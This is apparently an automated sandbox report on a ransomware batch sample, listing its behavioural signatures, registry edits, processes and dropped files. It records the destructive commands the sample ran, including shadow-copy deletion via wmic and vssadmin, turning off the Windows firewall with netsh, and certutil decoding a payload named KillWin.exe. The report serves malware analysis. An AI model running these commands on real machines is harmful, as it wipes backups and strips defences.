C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\system32\timeout.exe

timeout /t 4

C:\Windows\system32\certutil.exe

certutil -decode "Data.lp" "KillWin.exe"

C:\Windows\system32\wscript.exe

wscript "m.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=5688,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6564,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6524,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x470 0x49c

Network


Files

C:\Users\Admin\AppData\Local\Temp\Admin.log

C:\Users\Admin\AppData\Local\Temp\Image.bin

C:\Users\Admin\AppData\Local\Temp\0.vbs

C:\Users\Admin\AppData\Local\Temp\Data.lp

C:\Users\Admin\AppData\Local\Temp\KillWin.exe

C:\Users\Admin\AppData\Local\Temp\22211_1823.bat

C:\Users\Admin\AppData\Local\Temp\m.vbs

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 08:19

Reported

2024-06-26 08:22

Platform

win7-20240508-en

Max time kernel

117s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\22.bat"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 4c00310000000000a858d38210204c6f63616c00380008000400efbea8588181a858d3822a000000fe0100000000020000000000000000000000000000004c006f00630061006c00000014000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5200310000000000a8588181122041707044617461003c0008000400efbea8588181a85881812a000000eb0100000000020000000000000000000000000000004100700070004400610074006100000016000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c00310000000000a8587084100041646d696e00380008000400efbea8588181a85870842a00000030000000000004000000000000000000000000000000410064006d0069006e00000014000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4a00310000000000da588242102054656d700000360008000400efbea8588181da5882422a000000ff010000000002000000000000000000000000000000540065006d007000000014000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7400310000000000a85881811100557365727300600008000400efbeee3a851aa85881812a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1644 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1644 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1644 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1644 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 1644 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 1644 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 1644 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 1644 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 1644 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 1644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1644 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1644 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1644 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1644 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1644 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1644 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1644 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1644 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1644 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1644 wrote to memory of 580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 1644 wrote to memory of 580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 1644 wrote to memory of 580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 1644 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wscript.exe
PID 1644 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1644 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 300 wrote to memory of 296 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 300 wrote to memory of 296 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 300 wrote to memory of 296 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 1136 wrote to memory of 1068 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 1136 wrote to memory of 1068 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 1136 wrote to memory of 1068 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE
PID 980 wrote to memory of 2996 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\RUNDLL32.EXE

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\22.bat"

C:\Windows\system32\attrib.exe

attrib Admin-information.log +h

C:\Windows\explorer.exe

explorer .

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all/quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\mode.com

mode con: cols=170 lines=45

C:\Windows\system32\certutil.exe

certutil -decode "Image.bin" "Wallpaper.jpeg"

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 3

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\timeout.exe

timeout /t 4

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\system32\certutil.exe

certutil -decode "Data.lp" "KillWin.exe"

C:\Windows\system32\wscript.exe

wscript "m.vbs"

Network

N/A

Files

memory/2592-0-0x00000000039A0000-0x00000000039B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Admin.log

C:\Users\Admin\AppData\Local\Temp\Image.bin

C:\Users\Admin\AppData\Local\Temp\TempData\Null.dll

C:\Users\Admin\AppData\Local\Temp\0.vbs

C:\Users\Admin\AppData\Local\Temp\Wallpaper.jpeg

C:\Users\Admin\AppData\Local\Temp\Data.lp

C:\Users\Admin\AppData\Local\Temp\KillWin.exe

C:\Users\Admin\AppData\Local\Temp\4066_30760.bat

C:\Users\Admin\AppData\Local\Temp\m.vbs